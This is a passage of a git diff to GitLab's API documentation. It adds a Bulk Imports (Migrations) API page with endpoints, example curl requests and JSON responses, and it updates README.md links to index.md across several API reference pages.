GitLab Migrations (Bulk Imports) API + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/64335) in GitLab 14.1. + +With the GitLab Migrations API, you can view the progress of migrations initiated with +[GitLab Group Migration](../user/group/import/index.md). + +## List all GitLab migrations + +```plaintext +GET /bulk_imports +``` + +| Attribute | Type | Required | Description | +|:-----------|:--------|:---------|:---------------------------------------| +| `per_page` | integer | no | Number of records to return per page. | +| `page` | integer | no | Page to retrieve. | +| `status` | string | no | Import status. | + +The status can be one of the following: + +- `created` +- `started` +- `finished` +- `failed` + +```shell +curl --request GET --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/bulk_imports?per_page=2&page=1" +``` + +```json +[ + { + "id": 1, + "status": "finished", + "source_type": "gitlab", + "created_at": "2021-06-18T09:45:55.358Z", + "updated_at": "2021-06-18T09:46:27.003Z" + }, + { + "id": 2, + "status": "started", + "source_type": "gitlab", + "created_at": "2021-06-18T09:47:36.581Z", + "updated_at": "2021-06-18T09:47:58.286Z" + } +] +``` + +## List all GitLab migrations' entities + +```plaintext +GET /bulk_imports/entities +``` + +| Attribute | Type | Required | Description | +|:-----------|:--------|:---------|:---------------------------------------| +| `per_page` | integer | no | Number of records to return per page. | +| `page` | integer | no | Page to retrieve. | +| `status` | string | no | Import status. | + +The status can be one of the following: + +- `created` +- `started` +- `finished` +- `failed` + +```shell +curl --request GET --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/bulk_imports/entities?per_page=2&page=1&status=started" +``` + +```json +[ + { + "id": 1, + "bulk_import_id": 1, + "status": "finished", + "source_full_path": "source_group", + "destination_name": "destination_name", + "destination_namespace": "destination_path", + "parent_id": null, + "namespace_id": 1, + "project_id": null, + "created_at": "2021-06-18T09:47:37.390Z", + "updated_at": "2021-06-18T09:47:51.867Z", + "failures": [] + }, + { + "id": 2, + "bulk_import_id": 2, + "status": "failed", + "source_full_path": "another_group", + "destination_name": "another_name", + "destination_namespace": "another_namespace", + "parent_id": null, + "namespace_id": null, + "project_id": null, + "created_at": "2021-06-24T10:40:20.110Z", + "updated_at": "2021-06-24T10:40:46.590Z", + "failures": [ + { + "pipeline_class": "BulkImports::Groups::Pipelines::GroupPipeline", + "pipeline_step": "extractor", + "exception_class": "Exception", + "correlation_id_value": "dfcf583058ed4508e4c7c617bd7f0edd", + "created_at": "2021-06-24T10:40:46.495Z" + } + ] + } +] +``` + +## Get GitLab migration details + +```plaintext +GET /bulk_imports/:id +``` + +```shell +curl --request GET --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/bulk_imports/1" +``` + +```json +{ + "id": 1, + "status": "finished", + "source_type": "gitlab", + "created_at": "2021-06-18T09:45:55.358Z", + "updated_at": "2021-06-18T09:46:27.003Z" +} +``` + +## List GitLab migration entities + +```plaintext +GET /bulk_imports/:id/entities +``` + +| Attribute | Type | Required | Description | +|:-----------|:--------|:---------|:---------------------------------------| +| `per_page` | integer | no | Number of records to return per page. | +| `page` | integer | no | Page to retrieve. | +| `status` | string | no | Import status. | + +The status can be one of the following: + +- `created` +- `started` +- `finished` +- `failed` + +```shell +curl --request GET --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/bulk_imports/1/entities?per_page=2&page=1&status=finished" +``` + +```json +[ + { + "id": 1, + "status": "finished", + "source_type": "gitlab", + "created_at": "2021-06-18T09:45:55.358Z", + "updated_at": "2021-06-18T09:46:27.003Z" + } +] +``` + +## Get GitLab migration entity details + +```plaintext +GET /bulk_imports/:id/entities/:entity_id +``` + +```shell +curl --request GET --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/bulk_imports/1/entities/2" +``` + +```json +{ + "id": 1, + "status": "finished", + "source_type": "gitlab", + "created_at": "2021-06-18T09:45:55.358Z", + "updated_at": "2021-06-18T09:46:27.003Z" +} +``` diff --git a/doc/api/commits.md b/doc/api/commits.md index 711b565bdbd..e164532e0eb 100644 --- a/doc/api/commits.md +++ b/doc/api/commits.md @@ -19,7 +19,7 @@ GET /projects/:id/repository/commits | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | `ref_name` | string | no | The name of a repository branch, tag or revision range, or if not given the default branch | | `since` | string | no | Only commits after or on this date are returned in ISO 8601 format `YYYY-MM-DDTHH:MM:SSZ` | | `until` | string | no | Only commits before or on this date are returned in ISO 8601 format `YYYY-MM-DDTHH:MM:SSZ` | @@ -85,12 +85,12 @@ POST /projects/:id/repository/commits | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `branch` | string | yes | Name of the branch to commit into. To create a new branch, also provide either `start_branch` or `start_sha`, and optionally `start_project`. | | `commit_message` | string | yes | Commit message | | `start_branch` | string | no | Name of the branch to start the new branch from | | `start_sha` | string | no | SHA of the commit to start the new branch from | -| `start_project` | integer/string | no | The project ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) to start the new branch from. Defaults to the value of `id`. | +| `start_project` | integer/string | no | The project ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) to start the new branch from. Defaults to the value of `id`. | | `actions[]` | array | yes | An array of action hashes to commit as a batch. See the next table for what attributes it can take. | | `author_email` | string | no | Specify the commit author's email address | | `author_name` | string | no | Specify the commit author's name | @@ -174,7 +174,7 @@ Example response: } ``` -GitLab supports [form encoding](README.md#encoding-api-parameters-of-array-and-hash-types). The following is an example using Commit API with form encoding: +GitLab supports [form encoding](index.md#encoding-api-parameters-of-array-and-hash-types). The following is an example using Commit API with form encoding: ```shell curl --request POST \ @@ -212,7 +212,7 @@ Parameters: | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | `sha` | string | yes | The commit hash or name of a repository branch or tag | | `stats` | boolean | no | Include commit stats. Default is true | @@ -269,7 +269,7 @@ Parameters: | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | `sha` | string | yes | The commit hash | | `type` | string | no | The scope of commits. Possible values `branch`, `tag`, `all`. Default is `all`. | @@ -303,7 +303,7 @@ Parameters: | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `sha` | string | yes | The commit hash | | `branch` | string | yes | The name of the branch | | `dry_run` | boolean | no | Does not commit any changes. Default is false. [Introduced in GitLab 13.3](https://gitlab.com/gitlab-org/gitlab/-/issues/231032) | @@ -378,7 +378,7 @@ Parameters: | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `sha` | string | yes | Commit SHA to revert | | `branch` | string | yes | Target branch name | | `dry_run` | boolean | no | Does not commit any changes. Default is false. [Introduced in GitLab 13.3](https://gitlab.com/gitlab-org/gitlab/-/issues/231032) | @@ -446,7 +446,7 @@ Parameters: | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | `sha` | string | yes | The commit hash or name of a repository branch or tag | ```shell @@ -482,7 +482,7 @@ Parameters: | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | `sha` | string | yes | The commit hash or name of a repository branch or tag | ```shell @@ -531,7 +531,7 @@ POST /projects/:id/repository/commits/:sha/comments | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | `sha` | string | yes | The commit SHA or name of a repository branch or tag | | `note` | string | yes | The text of the comment | | `path` | string | no | The file path relative to the repository | @@ -576,7 +576,7 @@ Parameters: | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | `sha` | string | yes | The commit hash or name of a repository branch or tag | ```shell @@ -635,11 +635,11 @@ GET /projects/:id/repository/commits/:sha/statuses | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | `sha` | string | yes | The commit SHA | `ref` | string | no | The name of a repository branch or tag or, if not given, the default branch -| `stage` | string | no | Filter by [build stage](../ci/yaml/README.md#stages), e.g., `test` -| `name` | string | no | Filter by [job name](../ci/yaml/README.md#job-keywords), e.g., `bundler:audit` +| `stage` | string | no | Filter by [build stage](../ci/yaml/index.md#stages), for example, `test` +| `name` | string | no | Filter by [job name](../ci/yaml/index.md#job-keywords), for example, `bundler:audit` | `all` | boolean | no | Return all statuses, not only the latest ones ```shell @@ -709,7 +709,7 @@ POST /projects/:id/statuses/:sha | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | `sha` | string | yes | The commit SHA | `state` | string | yes | The state of the status. Can be one of the following: `pending`, `running`, `success`, `failed`, `canceled` | `ref` | string | no | The `ref` (branch or tag) to which the status refers @@ -762,7 +762,7 @@ GET /projects/:id/repository/commits/:sha/merge_requests | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | `sha` | string | yes | The commit SHA ```shell @@ -834,7 +834,7 @@ Parameters: | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | `sha` | string | yes | The commit hash or name of a repository branch or tag | ```shell diff --git a/doc/api/container_registry.md b/doc/api/container_registry.md index 4de024da2de..cf5a7f89c8b 100644 --- a/doc/api/container_registry.md +++ b/doc/api/container_registry.md @@ -42,7 +42,7 @@ GET /projects/:id/registry/repositories | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) accessible by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) accessible by the authenticated user. | | `tags` | boolean | no | If the parameter is included as true, each repository includes an array of `"tags"` in the response. | | `tags_count` | boolean | no | If the parameter is included as true, each repository includes `"tags_count"` in the response ([Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/32141) in GitLab 13.1). | @@ -85,7 +85,7 @@ GET /groups/:id/registry/repositories | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) accessible by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) accessible by the authenticated user. | | `tags` | boolean | no | If the parameter is included as true, each repository includes an array of `"tags"` in the response. | | `tags_count` | boolean | no | If the parameter is included as true, each repository includes `"tags_count"` in the response ([Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/32141) in GitLab 13.1). | @@ -200,7 +200,7 @@ DELETE /projects/:id/registry/repositories/:repository_id | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `repository_id` | integer | yes | The ID of registry repository. | ```shell @@ -220,7 +220,7 @@ GET /projects/:id/registry/repositories/:repository_id/tags | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) accessible by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) accessible by the authenticated user. | | `repository_id` | integer | yes | The ID of registry repository. | ```shell @@ -255,7 +255,7 @@ GET /projects/:id/registry/repositories/:repository_id/tags/:tag_name | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) accessible by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) accessible by the authenticated user. | | `repository_id` | integer | yes | The ID of registry repository. | | `tag_name` | string | yes | The name of tag. | @@ -289,7 +289,7 @@ DELETE /projects/:id/registry/repositories/:repository_id/tags/:tag_name | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `repository_id` | integer | yes | The ID of registry repository. | | `tag_name` | string | yes | The name of tag. | @@ -314,7 +314,7 @@ DELETE /projects/:id/registry/repositories/:repository_id/tags | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `repository_id` | integer | yes | The ID of registry repository. | | `name_regex` | string | no | The [re2](https://github.com/google/re2/wiki/Syntax) regex of the name to delete. To delete all tags specify `.*`. **Note:** `name_regex` is deprecated in favor of `name_regex_delete`. This field is validated. | | `name_regex_delete` | string | yes | The [re2](https://github.com/google/re2/wiki/Syntax) regex of the name to delete. To delete all tags specify `.*`. This field is validated. | diff --git a/doc/api/dependencies.md b/doc/api/dependencies.md index 6175c26ed75..c85a3521aed 100644 --- a/doc/api/dependencies.md +++ b/doc/api/dependencies.md @@ -30,7 +30,7 @@ GET /projects/:id/dependencies?package_manager=yarn,bundler | Attribute | Type | Required | Description | | ------------- | -------------- | -------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `package_manager` | string array | no | Returns dependencies belonging to specified package manager. Valid values: `bundler`, `composer`, `maven`, `npm`, `pip` or `yarn`. | ```shell diff --git a/doc/api/dependency_proxy.md b/doc/api/dependency_proxy.md index 139669c018c..e9ddc1e9df9 100644 --- a/doc/api/dependency_proxy.md +++ b/doc/api/dependency_proxy.md @@ -23,7 +23,7 @@ DELETE /groups/:id/dependency_proxy/cache | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | Example request: diff --git a/doc/api/deploy_keys.md b/doc/api/deploy_keys.md index 3b063180900..3d6d680e3e4 100644 --- a/doc/api/deploy_keys.md +++ b/doc/api/deploy_keys.md @@ -47,7 +47,7 @@ GET /projects/:id/deploy_keys | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | ```shell curl --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/5/deploy_keys" @@ -86,7 +86,7 @@ Parameters: | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `key_id` | integer | yes | The ID of the deploy key | ```shell @@ -118,7 +118,7 @@ POST /projects/:id/deploy_keys | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `title` | string | yes | New deploy key's title | | `key` | string | yes | New deploy key | | `can_push` | boolean | no | Can deploy key push to the project's repository | @@ -151,7 +151,7 @@ PUT /projects/:id/deploy_keys/:key_id | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `title` | string | no | New deploy key's title | | `can_push` | boolean | no | Can deploy key push to the project's repository | @@ -182,7 +182,7 @@ DELETE /projects/:id/deploy_keys/:key_id | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `key_id` | integer | yes | The ID of the deploy key | ```shell @@ -199,7 +199,7 @@ curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" "https://gitla | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `key_id` | integer | yes | The ID of the deploy key | Example response: diff --git a/doc/api/deploy_tokens.md b/doc/api/deploy_tokens.md index d8aab8896a1..6ed8f76583f 100644 --- a/doc/api/deploy_tokens.md +++ b/doc/api/deploy_tokens.md @@ -66,7 +66,7 @@ Parameters: | Attribute | Type | Required | Description | |:---------------|:---------------|:-----------------------|:------------| -| `id` | integer/string | **{check-circle}** Yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer/string | **{check-circle}** Yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `active` | boolean | **{dotted-circle}** No | Limit by active status. | Example request: @@ -108,7 +108,7 @@ Parameters: | Attribute | Type | Required | Description | | ------------ | ---------------- | ---------------------- | ----------- | -| `id` | integer/string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `name` | string | **{check-circle}** Yes | New deploy token's name | | `expires_at` | datetime | **{dotted-circle}** No | Expiration date for the deploy token. Does not expire if no value is provided. Expected in ISO 8601 format (`2019-03-15T08:00:00Z`) | | `username` | string | **{dotted-circle}** No | Username for deploy token. Default is `gitlab+deploy-token-{n}` | @@ -153,7 +153,7 @@ Parameters: | Attribute | Type | Required | Description | | ---------- | -------------- | ---------------------- | ----------- | -| `id` | integer/string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `token_id` | integer | **{check-circle}** Yes | The ID of the deploy token | Example request: @@ -182,7 +182,7 @@ Parameters: | Attribute | Type | Required | Description | |:---------------|:---------------|:-----------------------|:------------| -| `id` | integer/string | **{check-circle}** Yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer/string | **{check-circle}** Yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `active` | boolean | **{dotted-circle}** No | Limit by active status. | Example request: @@ -224,7 +224,7 @@ Parameters: | Attribute | Type | Required | Description | | ------------ | ---- | --------- | ----------- | -| `id` | integer/string | **{check-circle}** Yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | **{check-circle}** Yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `name` | string | **{check-circle}** Yes | New deploy token's name | | `expires_at` | datetime | **{dotted-circle}** No | Expiration date for the deploy token. Does not expire if no value is provided. Expected in ISO 8601 format (`2019-03-15T08:00:00Z`) | | `username` | string | **{dotted-circle}** No | Username for deploy token. Default is `gitlab+deploy-token-{n}` | @@ -269,7 +269,7 @@ Parameters: | Attribute | Type | Required | Description | | ----------- | -------------- | ---------------------- | ----------- | -| `id` | integer/string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `token_id` | integer | **{check-circle}** Yes | The ID of the deploy token | Example request: diff --git a/doc/api/deployments.md b/doc/api/deployments.md index a2e56fc8557..3ed431cf63d 100644 --- a/doc/api/deployments.md +++ b/doc/api/deployments.md @@ -17,7 +17,7 @@ GET /projects/:id/deployments | Attribute | Type | Required | Description | |------------------|----------------|----------|-----------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `order_by` | string | no | Return deployments ordered by either one of `id`, `iid`, `created_at`, `updated_at` or `ref` fields. Default is `id`. | | `sort` | string | no | Return deployments sorted in `asc` or `desc` order. Default is `asc`. | | `updated_after` | datetime | no | Return deployments updated after the specified date. Expected in ISO 8601 format (`2019-03-15T08:00:00Z`). | @@ -184,7 +184,7 @@ GET /projects/:id/deployments/:deployment_id | Attribute | Type | Required | Description | |-----------|---------|----------|---------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `deployment_id` | integer | yes | The ID of the deployment | ```shell @@ -272,7 +272,7 @@ POST /projects/:id/deployments | Attribute | Type | Required | Description | |---------------|----------------|----------|-----------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user.| +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user.| | `environment` | string | yes | The [name of the environment](../ci/environments/index.md) to create the deployment for. | | `sha` | string | yes | The SHA of the commit that is deployed. | | `ref` | string | yes | The name of the branch or tag that is deployed. | @@ -319,7 +319,7 @@ PUT /projects/:id/deployments/:deployment_id | Attribute | Type | Required | Description | |------------------|----------------|----------|---------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `deployment_id` | integer | yes | The ID of the deployment to update. | | `status` | string | no | The new status of the deployment. One of `created`, `running`, `success`, `failed`, or `canceled`. | diff --git a/doc/api/discussions.md b/doc/api/discussions.md index d8d989adfe2..9e9b9dcc901 100644 --- a/doc/api/discussions.md +++ b/doc/api/discussions.md @@ -21,7 +21,7 @@ This includes system notes, which are notes about changes to the object (for exa By default, `GET` requests return 20 results at a time because the API results are paginated. -Read more on [pagination](README.md#pagination). +Read more on [pagination](index.md#pagination). ## Issues @@ -35,7 +35,7 @@ GET /projects/:id/issues/:issue_iid/discussions | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | ------------ | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `issue_iid` | integer | yes | The IID of an issue | ```json @@ -133,7 +133,7 @@ Parameters: | Attribute | Type | Required | Description | | --------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `issue_iid` | integer | yes | The IID of an issue | | `discussion_id` | integer | yes | The ID of a discussion item | @@ -153,7 +153,7 @@ Parameters: | Attribute | Type | Required | Description | | --------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `issue_iid` | integer | yes | The IID of an issue | | `body` | string | yes | The content of the thread | | `created_at` | string | no | Date time string, ISO 8601 formatted, such as `2016-03-11T03:45:40Z` (requires administrator or project/group owner rights) | @@ -164,7 +164,7 @@ curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" "https://gitla ### Add note to existing issue thread -Adds a new note to the thread. This can also [create a thread from a single comment](../user/discussions/#start-a-thread-by-replying-to-a-standard-comment). +Adds a new note to the thread. This can also [create a thread from a single comment](../user/discussions/#create-a-thread-by-replying-to-a-standard-comment). **WARNING** Notes can be added to other items than comments, such as system notes, making them threads. @@ -177,7 +177,7 @@ Parameters: | Attribute | Type | Required | Description | | --------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `issue_iid` | integer | yes | The IID of an issue | | `discussion_id` | integer | yes | The ID of a thread | | `note_id` | integer | yes | The ID of a thread note | @@ -200,7 +200,7 @@ Parameters: | Attribute | Type | Required | Description | | --------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `issue_iid` | integer | yes | The IID of an issue | | `discussion_id` | integer | yes | The ID of a thread | | `note_id` | integer | yes | The ID of a thread note | @@ -222,7 +222,7 @@ Parameters: | Attribute | Type | Required | Description | | --------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `issue_iid` | integer | yes | The IID of an issue | | `discussion_id` | integer | yes | The ID of a discussion | | `note_id` | integer | yes | The ID of a discussion note | @@ -243,7 +243,7 @@ GET /projects/:id/snippets/:snippet_id/discussions | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | ------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `snippet_id` | integer | yes | The ID of an snippet | ```json @@ -341,7 +341,7 @@ Parameters: | Attribute | Type | Required | Description | | --------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `snippet_id` | integer | yes | The ID of an snippet | | `discussion_id` | integer | yes | The ID of a discussion item | @@ -362,7 +362,7 @@ Parameters: | Attribute | Type | Required | Description | | --------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `snippet_id` | integer | yes | The ID of an snippet | | `body` | string | yes | The content of a discussion | | `created_at` | string | no | Date time string, ISO 8601 formatted, such as `2016-03-11T03:45:40Z` (requires administrator or project/group owner 